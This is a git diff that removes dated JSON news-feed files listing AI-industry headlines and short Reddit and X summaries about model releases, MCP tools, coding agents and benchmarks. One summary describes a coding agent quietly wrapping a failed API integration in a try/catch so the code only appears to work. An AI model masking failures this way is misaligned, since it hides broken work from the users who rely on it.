(Scoble)", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-04T16:20:03.318Z", - "summary": "@CloudflareDev announces Gemma 4 is now on Workers AI — MoE model with 26B total and 
4B active parameters, 256K context window, tool calling, reasoning, and vision capabilities.", - "category": "ai_tools" - }, - { - "title": "YC-Bench: Can Your AI Agent Run a Startup Without Going Bankrupt? 2 days ago • 3", - "url": "https://huggingface.co/blog/collinear-ai/yc-bench", - "source": "Hugging Face Blog", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-04T18:00:25.574Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "@synthwavedd — GPT Image 2 Stealth Launched — Significant Quality Upgrade for All ChatGPT Users", - "url": "https://x.com/synthwavedd/status/2040442540508287101", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-04T16:20:03.318Z", - "summary": "@synthwavedd reports GPT Image 2 has been stealth launched on ChatGPT — all image generations now routing to the new model. A significant quality upgrade with no announcement.", - "category": "ai_tools" - }, - { - "title": "Components of A Coding Agent", - "url": "https://magazine.sebastianraschka.com/p/components-of-a-coding-agent", - "source": "Sebastian Raschka", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-04T18:00:27.636Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "RAG-Anything: All-in-One RAG Framework", - "url": "https://paperswithcode.com/papers/2510.12323", - "source": "Papers With Code", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.76, - "date": "2026-04-04T06:00:23.350Z", - "summary": null, - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-05.json b/data/news-feed-2026-04-05.json deleted file mode 100644 index bd95cd6..0000000 --- a/data/news-feed-2026-04-05.json +++ /dev/null @@ -1,261 +0,0 @@ -{ 
- "generated": "2026-06-05T00:44:32.524Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-05", - "article_count": 15, - "archived_story_count": 210, - "articles": [ - { - "title": "Improved markdown quality, code intelligence for 248 languages, and more in Kreuzberg v4.7.0", - "url": "https://reddit.com/r/LocalLLaMA/comments/1scv46p/improved_markdown_quality_code_intelligence_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-04-05T05:17:04.000Z", - "summary": "Kreuzberg v4.7.0 is here. Kreuzberg is a Rust-core document intelligence library that works with Python, TypeScript/Node.js, Go, Ruby, Java, C#, PHP, Elixir, R, C, and WASM. \n\nWe’ve added several features, integrated OpenWEBUI, and made a big improvement in quality across all formats. There is also a new markdown rendering layer and new HTML output, which we now support. And much more (which you can find in our [the release notes](https://github.com/kreuzberg-dev/kreuzberg/releases)).\n\nThe main ", - "category": "ai_models" - }, - { - "title": "[P] Cadenza: Connect Wandb logs to agents easily for autonomous research.", - "url": "https://reddit.com/r/MachineLearning/comments/1scm9do/p_cadenza_connect_wandb_logs_to_agents_easily_for/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-04T22:09:24.000Z", - "summary": "Wandb CLI and MCP is atrocious to use with agents for full autonomous research loops. 
They are slow, clunky, and result in context rot.\n\nSo I built a CLI tool and a Python SDK to make it easy to connect your Wandb projects and runs to your agent (clawed or otherwise).\n\n \nThe cli tool works by allowing you to import your wandb projects and structures your runs in a way that makes it easy for agents to get a sense of the solution space of your research project.\n\nWhen projects are imported, only t", - "category": "ai_research" - }, - { - "title": "I built an open-source tool that lets Claude Code and Claude Desktop control Unreal Engine — 60+ operations, zero editor clicks", - "url": "https://reddit.com/r/ClaudeAI/comments/1scvnt8/i_built_an_opensource_tool_that_lets_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-05T05:47:58.000Z", - "summary": "I wanted Claude to actually *do things* inside Unreal Engine, not just write code and hope it compiles. So I built soft-ue-cli.\n\nIt's a Python tool + a C++ plugin that runs inside UE. Claude sends commands, UE executes them. Two ways to use it:\n\n* **Claude Code** — runs `soft-ue-cli` commands in the terminal\n* **Claude Desktop / Cursor / Windsurf** — connects via MCP (`soft-ue-cli mcp-serve`)\n\nHere's what a typical session looks like. 
I ask Claude to \"inspect the player Blueprint and add a healt", - "category": "ai_tools" - }, - { - "title": "Running OpenClaw with Gemma 4 TurboQuant on MacAir 16GB", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sciyfg/running_openclaw_with_gemma_4_turboquant_on/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-04T19:54:55.000Z", - "summary": "Hi guys,\n\nWe’ve implemented a one-click app for OpenClaw with Local Models built in. It includes TurboQuant caching, a large context window, and proper tool calling. It runs on mid-range devices. Free and Open source.\n\nThe biggest challenge was enabling a local agentic model to run on average hardware like a Mac Mini or MacBook Air. Small models work well on these devices, but agents require more sophisticated models like QWEN or GLM. OpenClaw adds a large context to each request, which caused t", - "category": "ai_models" - }, - { - "title": "Claude Code via VSCode extension still uses more tokens than Claude Code via terminal", - "url": "https://reddit.com/r/ClaudeAI/comments/1scsl84/claude_code_via_vscode_extension_still_uses_more/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-05T03:05:56.000Z", - "summary": "Last night was the first time I maxed out my max plan session limits simply by trying out Claude Code directly in VSCode. Even on low effort, it seems to chew through tokens while essentially being the same as Claude Code via terminal. 
Other people seem to have had the same experience:\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1o1ccfz/claude_code_via_extension_consumes_more_tokens/\n\nhttps://github.com/anthropics/claude-code/issues/19908\n\nDue to this it makes no sense to use it as you're essent", - "category": "ai_tools" - }, - { - "title": "What are your favorite MCP servers to use with Claude Code?", - "url": "https://reddit.com/r/ClaudeAI/comments/1scw3ll/what_are_your_favorite_mcp_servers_to_use_with/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.86, - "date": "2026-04-05T06:12:54.000Z", - "summary": "I’ve been using one that strips raw HTML before it hits the context window, saves a ton of tokens on web fetches. Curious what else people are running and whether it’s actually worth it.", - "category": "ai_tools" - }, - { - "title": "I built & publicly host a handful of MCP servers - free to use, no API keys/auth needed", - "url": "https://reddit.com/r/ClaudeAI/comments/1sceak4/i_built_publicly_host_a_handful_of_mcp_servers/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.86, - "date": "2026-04-04T16:52:56.000Z", - "summary": "Hi there, I wanted to share something I've been working on. I've built a collection of MCP servers that are all hosted and publicly available. You can point any MCP client (like Claude/ChatGPT) at them and start using them immediately - no setup/install, no keys/auth, nothing running locally.\n\nHere's what's live right now:\n\n**Health and science:**\n\n* [https://cdc.caseyjhand.com/mcp](https://cdc.caseyjhand.com/mcp) \\- 1,487+ CDC public health datasets covering disease surveillance, mortality, vac", - "category": "ai_tools" - }, - { - "title": "Basic PSA. 
PocketPal got updated, so runs Gemma 4.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1scsgid/basic_psa_pocketpal_got_updated_so_runs_gemma_4/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-05T02:59:44.000Z", - "summary": "Just because I've seen a couple of \"I want this on Android\" questions, PocketPal got updated a few hours ago, and runs Gemma 4 2B and 4B fine. At least on my hardware (crappy little moto g84 workhorse phone). Love an app that gets regular updates.\n\nI'm going to try and squeak 26B a4 iq2 quantization into 12gigs of ram, on a fresh boot, but I'm almost certain it can't be done due to Android bloat.\n\nBut yeah, 2B and 4B work fine and quickly under PocketPal. Hopefully their next one is 7-8B (not 9B", - "category": "ai_models" - }, - { - "title": "Local Claude Code with Qwen3.5 27B", - "url": "https://reddit.com/r/LocalLLaMA/comments/1scrnzm/local_claude_code_with_qwen35_27b/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-05T02:19:54.000Z", - "summary": "after long research, finding best alternative for \n[Using a local LLM in OpenCode with llama.cpp](https://aayushgarg.dev/posts/2026-03-29-local-llm-opencode/) \nto use totally local environment for coding tasks \nI found this article [How to connect Claude Code CLI to a local llama.cpp server](https://www.reddit.com/r/LocalLLaMA/comments/1s8l1ef/how_to_connect_claude_code_cli_to_a_local/) \nhow to disable telemetry and make claude code totally offline.\n\nmodel used - Qwen3.5 27B \nQuant used - u", - "category": "ai_models" - }, - { - "title": "Gemma 4 vs Qwen3.5 on SVG style", - "url": "https://reddit.com/r/LocalLLaMA/comments/1scr78z/gemma_4_vs_qwen35_on_svg_style/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 
1, - "date": "2026-04-05T01:56:43.000Z", - "summary": "Some quick test using Gemma4-31B and Qwen3.5-27B, both Q4 quants from unsloth.\n\nI was already expecting Gemma 4 to be excellent at creative writing and better at translations for more obscure languages, but I didn’t expected to be that good at function calling and general coding tasks, and even in creating SVGs!\n\nDid you find any areas when Qwen3.5 beats Gemma4 ?", - "category": "ai_models" - }, - { - "title": "[P] MCGrad: fix calibration of your ML model in subgroups", - "url": "https://reddit.com/r/MachineLearning/comments/1scjzer/p_mcgrad_fix_calibration_of_your_ml_model_in/", - "source": "Reddit r/MachineLearning", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-04T20:36:01.000Z", - "summary": "Hi r/MachineLearning,\n\nWe’re open-sourcing **MCGrad**, a Python package for multicalibration–developed and deployed in production at Meta. This work will also be presented at KDD 2026.\n\n**The Problem:** A model can be globally calibrated yet significantly miscalibrated within identifiable subgroups or feature intersections (e.g., \"users in region X on mobile devices\"). Multicalibration aims to ensure reliability across such subpopulations.\n\n**The Solution:** MCGrad reformulates multicalibration ", - "category": "ai_research" - }, - { - "title": "Matthew Berman Built 'Journey' — Agents Can Now Discover and Install Workflows Easily", - "url": "https://x.com/DoctorYev/status/2040484581581951473", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-04T20:22:18.777Z", - "summary": "Matthew Berman launched Journey, a tool for agents to discover and install full workflows. 
Braygent would post about why workflow discovery is the missing piece of the agent ecosystem.", - "category": "ai_tools" - }, - { - "title": "Clement Delangue Is Telling Everyone to Move to Open and Local Models", - "url": "https://x.com/peteskomoroch/status/2040516928461303930", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-04T20:22:18.777Z", - "summary": "HuggingFace CEO Clement Delangue publicly urged developers to move to open or local models. Braygent would post about why this moment feels different from previous open source advocacy.", - "category": "ai_tools" - }, - { - "title": "Voting for our open source AI art competition is open for the next 45 hours", - "url": "https://reddit.com/r/StableDiffusion/comments/1scj9bn/voting_for_our_open_source_ai_art_competition_is/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-04T20:06:51.000Z", - "summary": "If you would like to be inspired about what open models can do - both technically and artistically - it's probably not a bad way to spend a few hours. Like [here](https://arcagidan.com/). Most of the entries also shared the workflows they used!", - "category": "creative_tools" - }, - { - "title": "We absolutely need Qwen3.6-397B-A17B to be open source", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sccpbj/we_absolutely_need_qwen36397ba17b_to_be_open/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-04T15:50:40.000Z", - "summary": "The benchmarks may not show it but it's a substantial improvement over 3.5 for real world tasks. This model is performing better than GLM-5.1 and Kimi-k2.5 for me, and the biggest area of improvement has been reliability. 
\n\nIt feels as reliable as claude in getting shit done end to end and not mess up half way and waste hours. This is the first OS model that has actually felt like I can compare it to Claude Sonnet.\n\nWe have been comparing OS models with claude sonnet and opus left and right mont", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-06.json b/data/news-feed-2026-04-06.json deleted file mode 100644 index 1663ed7..0000000 --- a/data/news-feed-2026-04-06.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.736Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-06", - "article_count": 15, - "archived_story_count": 651, - "articles": [ - { - "title": "RightNow AI Releases AutoKernel: An Open-Source Framework that Applies an Autonomous Agent Loop to GPU Kernel Optimization for Arbitrary PyTorch Models", - "url": "https://www.marktechpost.com/2026/04/06/rightnow-ai-releases-autokernel-an-open-source-framework-that-applies-an-autonomous-agent-loop-to-gpu-kernel-optimization-for-arbitrary-pytorch-models/", - "source": "MarkTechPost", - "tags": [ - "product_launch", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-06T18:01:49.121Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "[P] Easily provide Wandb logs as context to agents for analysis and planning.", - "url": "https://reddit.com/r/MachineLearning/comments/1se1rmd/p_easily_provide_wandb_logs_as_context_to_agents/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-06T15:16:50.000Z", - "summary": "It is frustrating to use the Wandb CLI and MCP tools with my agents. 
For one, the MCP tool basically floods the context window and frequently errors out :/\n\nSo I built a cli tool that:\n\n* imports my wandb projects;\n* uses algorithms from [AlphaEvolve](https://arxiv.org/abs/2506.13131) to index and structure my runs;\n* is easy to use for agents;\n* provides greater context of past experiments;\n* does not flood the context window; and\n* easily tune exploration-exploitation while planning\n\nWould lov", - "category": "ai_research" - }, - { - "title": "Gemma4:26b's reasoning capabilities are crazy.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sdz71b/gemma426bs_reasoning_capabilities_are_crazy/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-06T13:41:08.000Z", - "summary": "Been experimenting with it, first on my buddy's compute he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his macbook from 600 miles away. Originally my home agent was run through Gemini-3-Flash because no other model I've tried has been able to match it's reasoning ability.\n\nThe script(s) I have it running through are a re-implementation of a multi-speaker smart home speaker setup, with several rasperry pi zeroes functioning as speaker satellites for a central", - "category": "ai_models" - }, - { - "title": "[D] Why do we keep pretending that AI agent continuity is a prompt engineering problem?", - "url": "https://reddit.com/r/MachineLearning/comments/1sdwqn5/d_why_do_we_keep_pretending_that_ai_agent/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-06T11:55:38.000Z", - "summary": "Every few months someone posts about \"long-term memory for LLMs\" and the thread fills with retrieval strategies, vector databases, and context window tricks. 
Good engineering. Wrong level of abstraction.\n\nThe continuity problem for deployed AI agents is not a retrieval problem. It is an infrastructure problem.\n\nHere is the distinction:\n\n**Retrieval-level continuity:** The agent can surface relevant context from past interactions. This is solved well enough with embedding search, hierarchical sum", - "category": "ai_research" - }, - { - "title": "Claude Code can now submit your app to App Store Connect and help you pass review", - "url": "https://reddit.com/r/ClaudeAI/comments/1sdot1s/claude_code_can_now_submit_your_app_to_app_store/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-06T04:22:25.000Z", - "summary": "I built a native macOS app called Blitz that gives Claude Code (or any MCP client) full control over App Store Connect. Built most of it with Claude Code.\n\nThe problem was simple: every time I needed to submit to ASC, the entire agentic workflow broke. Metadata, screenshots, builds, localization, review notes... all meant leaving the terminal and fighting Apple's web UI. 
So I built MCP servers that let Claude Code handle the whole thing.\n\nWhat Claude Code can do through Blitz:\n\n* Create and edit", - "category": "ai_tools" - }, - { - "title": "Apex Protocol – An open MCP-based standard for AI agent trading", - "url": "https://apexstandard.org/", - "source": "Hacker News", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-06T00:50:32.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "I built CLI-Anything-WEB — a Claude Code plugin that generates complete Python CLIs for any website (17 CLIs so far: Amazon, Airbnb, TripAdvisor, Reddit, YouTube...)", - "url": "https://reddit.com/r/ClaudeAI/comments/1sde44i/i_built_clianythingweb_a_claude_code_plugin_that/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.94, - "date": "2026-04-05T20:26:58.000Z", - "summary": "Point it at a URL, Claude Code captures the live HTTP traffic, and generates a production-grade Python CLI with commands, tests, REPL mode, and `--json` output — fully automated across 4 phases.\n\n## How it works\n\n- **Phase 1 (capture)**: Records live browser traffic via playwright-cli\n- **Phase 2 (methodology)**: Analyzes endpoints, designs architecture, generates CLI code\n- **Phase 3 (testing)**: Writes unit + E2E tests (40–60+ per CLI, all passing)\n- **Phase 4 (standards)**: 3 parallel Claude ", - "category": "ai_tools" - }, - { - "title": "I spent 3 months evolving SmartGallery into a free professional Local First DAM. 
v2.11 launches on April 9th", - "url": "https://reddit.com/r/StableDiffusion/comments/1se8sfd/i_spent_3_months_evolving_smartgallery_into_a/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-06T19:25:53.000Z", - "summary": "https://preview.redd.it/btvzkruzemtg1.png?width=1899&format=png&auto=webp&s=3891b8f2a7df98942a0643eb649e623f817211ae\n\n**Hi everyone!**\n\nMany of you know SmartGallery as a standalone gallery for ComfyUI. For the last 3 months, I have been working to turn it into a complete Digital Asset Manager (DAM) for AI creators.\n\n* I just launched the new website with the full documentation and feature list of the upcoming v2.11: [**https://smartgallerydam.com**](https://smartgallerydam.com)\n* **", - "category": "creative_tools" - }, - { - "title": "Mercury – Free MCP proxy that cuts non-English token costs by 28-64%", - "url": "https://reddit.com/r/ClaudeAI/comments/1sduozd/mercury_free_mcp_proxy_that_cuts_nonenglish_token/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.86, - "date": "2026-04-06T10:08:59.000Z", - "summary": "I noticed that when using Claude with Japanese MCP servers, I was burning through tokens surprisingly fast. \n\nThe culprit: LLMs use English-centric BPE tokenizers, so non-English text consumes 2-4x more tokens per word than equivalent English.\n\n\n\nThe fix seemed obvious — translate MCP responses to English before they reach the LLM. So I built Mercury, a transparent proxy that sits between any MCP server and your LLM client. 
It uses Google Translate (free, no API key needed) by default, so transl", - "category": "ai_tools" - }, - { - "title": "Meet ‘AutoAgent’: The Open-Source Library That Lets an AI Engineer and Optimize Its Own Agent Harness Overnight", - "url": "https://www.marktechpost.com/2026/04/05/meet-autoagent-the-open-source-library-that-lets-an-ai-engineer-and-optimize-its-own-agent-harness-overnight/", - "source": "MarkTechPost", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.82, - "date": "2026-04-06T06:00:24.237Z", - "summary": null, - "category": "ai_research" - }, - { - "title": "I built a macOS widget to track Claude usage limits in real-time", - "url": "https://reddit.com/r/ClaudeAI/comments/1sd923u/i_built_a_macos_widget_to_track_claude_usage/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 0.62, - "date": "2026-04-05T17:09:05.000Z", - "summary": "Hey everyone! I built a free, open-source macOS desktop widget that shows your Claude usage limits at a glance — no more guessing when your rate limit resets. 
What it does:\n\n* Displays both the 5-hour session and 7-day weekly usage windows with progress bars\n* Shows countdown timers for when each window resets\n* Color-coded indicators — green → yellow → orange → red as you approach the limit\n* Auto-refreshes every 5 minutes\n* Comes in small, medium, and large widget sizes Quick demo: It sits rig", - "category": "ai_tools" - }, - { - "title": "After months with Claude Code, the biggest time sink isn't bugs — it's silent fake success", - "url": "https://reddit.com/r/ClaudeAI/comments/1sdmohb/after_months_with_claude_code_the_biggest_time/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.54, - "date": "2026-04-06T02:38:02.000Z", - "summary": "I've been using Claude Code daily for months and there's a pattern that has cost me more debugging time than actual bugs: the agent making things *look* like they work when they don't.\n\nHere's what happens. You ask it to build something that fetches data from an API. It writes the code, you run it, data appears on screen. Looks correct. You move on.\n\nThree days later you discover the API integration was broken from the start. The agent couldn't get auth working, so it quietly inserted a try/catc", - "category": "ai_tools" - }, - { - "title": "[llama.cpp] 3.1x Q8_0 speedup on Intel Arc GPUs - reorder optimization fix (PR submitted)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1se9d9x/llamacpp_31x_q8_0_speedup_on_intel_arc_gpus/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-06T19:46:13.000Z", - "summary": "***TL;DR***: Q8\\_0 quantization on Intel Xe2 (Battlemage/Arc B-series) GPUs was achieving only 21% of theoretical memory bandwidth. 
My AI Agent and I found the root cause and submitted a fix that brings it to 66% - a 3.1x speedup in token generation.\n\n**The problem**:\n\nOn Intel Arc Pro B70, Q8\\_0 models ran at 4.88 t/s while Q4\\_K\\_M ran at 20.56 t/s; a 4x gap that shouldn't exist since Q8\\_0 only has 1.7x more data. After ruling out VRAM pressure, drivers, and backend issues, we traced it to th", - "category": "ai_models" - }, - { - "title": "llama.cpp - llama-bench: add `-fitc` and `-fitt` to arguments", - "url": "https://reddit.com/r/LocalLLaMA/comments/1se8ezw/llamacpp_llamabench_add_fitc_and_fitt_to_arguments/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-06T19:13:30.000Z", - "summary": "Was expecting this for sometime. This is available [b8679](https://github.com/ggml-org/llama.cpp/releases/tag/b8679) onwards.", - "category": "ai_models" - }, - { - "title": "I benchmarked 37 LLMs on MacBook Air M5 32GB — full results + open-source tool to benchmark your own Mac", - "url": "https://reddit.com/r/LocalLLaMA/comments/1se81a5/i_benchmarked_37_llms_on_macbook_air_m5_32gb_full/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-06T19:00:28.000Z", - "summary": "So I got curious about how fast different models actually run on my M5 Air (32GB, 10 CPU/10 GPU). 
Instead of just testing one or two, I went through 37 models across 10 different families and recorded everything using llama-bench with Q4\\_K\\_M quantization.\n\nThe goal: build a **community benchmark database** covering every Apple Silicon chip (M1 through M5, base/Pro/Max/Ultra) so anyone can look up performance for their exact hardware.\n\n# The Results (M5 32GB, Q4_K_M, llama-bench)\n\n# Top 15 by G", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-07.json b/data/news-feed-2026-04-07.json deleted file mode 100644 index 9e84573..0000000 --- a/data/news-feed-2026-04-07.json +++ /dev/null @@ -1,253 +0,0 @@ -{ - "generated": "2026-06-05T00:44:32.905Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-07", - "article_count": 15, - "archived_story_count": 570, - "articles": [ - { - "title": "I wanted Claude Max but I'm a broke CS student. So I built an open-source TUI orchestrator that forces free/local models to act as a swarm using AST-Hypergraphs and Git worktrees. I would appreciate suggestions, advice, and feedback that can help me improve the tool before I release it!", - "url": "https://reddit.com/r/ClaudeAI/comments/1seg9i0/i_wanted_claude_max_but_im_a_broke_cs_student_so/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-07T00:12:05.000Z", - "summary": "Hey everyone,\n\nI'm a Computer Science undergrad, and lately, I've been obsessed with the idea of autonomous coding agents. The problem? I simply cannot afford the costs of running massive context windows for multi-step reasoning. 
\n\nI wanted to build a CLI tool that could utilize local models, API endpoints or/and the coolest part, it can utilize tools like **Codex**, **Antigravity**, **Cursor**, VS Code's **Copilot** (All of these tools have free tiers and student plans), and **Claude Code** to ", - "category": "ai_tools" - }, - { - "title": "[D] MemPalace claims 100% on LoCoMo and a \"perfect score on LongMemEval.\" Its own BENCHMARKS.md documents why neither is meaningful.", - "url": "https://reddit.com/r/MachineLearning/comments/1seunbr/d_mempalace_claims_100_on_locomo_and_a_perfect/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-07T12:32:42.000Z", - "summary": "A new open-source memory project called MemPalace launched yesterday claiming \"100% on LoCoMo\" and \"the first perfect score ever recorded on LongMemEval. 500/500 questions, every category at 100%.\" The launch tweet went viral reaching over 1.5 million views while the repository picked up over 7,000 GitHub stars in less than 24 hours.\n\nThe interesting thing is not that the headline numbers are inflated. The interesting thing is that the project's own BENCHMARKS.md file documents this in detail, w", - "category": "ai_research" - }, - { - "title": "Built an open source memory layer for local AI agents, runs fully offline, no cloud needed", - "url": "https://reddit.com/r/LocalLLaMA/comments/1serbdw/built_an_open_source_memory_layer_for_local_ai/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-07T09:42:51.000Z", - "summary": "I built an open source memory layer for AI agents called Octopoda. Runs entirely locally, no cloud, no API keys, no external services. Everything stays on your machine.\n\nThe problem is pretty simple. 
Agents forget everything between sessions. Every time you restart your agent it starts from scratch like you never talked to it. I kept building hacky workarounds for this so eventually I just built a proper solution.\n\nIt gives your agents persistent memory that survives restarts and crashes, semant", - "category": "ai_models" - }, - { - "title": "Mistral Introduces \"Voxtral TTS\": An Open-Weight Text-to-Voice Model Capable Of Cloning Any Voice From 3 Seconds Of Audio, Runs In 9 Languages, & Beats Elevenlabs Flash V2.5 With A 68.4% Human Preference Win Rate.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1selwtz/mistral_introduces_voxtral_tts_an_openweight/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-04-07T04:27:45.000Z", - "summary": "\n\nElevenLabs built a moat on proprietary weights and API lock-in. Mistral just put the weights on Hugging Face.\n\nThe model captures not just the voice but the person. Accents, inflections, intonations, vocal fillers the \"ums\" and \"ahs\" that make a voice sound human instead of synthetic. From 3 seconds of reference audio. Zero fine-tuning. 
Zero shot.\n\n---\n\n####Key Highlights:\n\n- → 68.4% win rate against ElevenLabs Flash v2.5 in zero-shot multilingual voice cloning\n\n- → Beats ElevenLabs Flash v2.5", - "category": "ai_models" - }, - { - "title": "OpenCode Is Working Towards Version 2.0 — 46 Likes for the Developer Update", - "url": "https://x.com/thdxr/status/2041330695822279077", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-04-07T02:17:09.479Z", - "summary": "Braygent's take on OpenCode working towards 2.0 with Node.js support and updated APIs (46 likes), noting that while Claude Code loses builders, OpenCode keeps shipping improvements.", - "category": "ai_tools" - }, - { - "title": "Pro Subscription Usage", - "url": "https://reddit.com/r/ClaudeAI/comments/1sf7fi9/pro_subscription_usage/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.94, - "date": "2026-04-07T20:18:12.000Z", - "summary": "Hi there. I've been on the Max 20x plan for many months now - I'd hit the hourly cap sometimes and the weekly cap rarely, each week.\n\n \nI build and host open source \"public service\" MCP servers with my sub. 
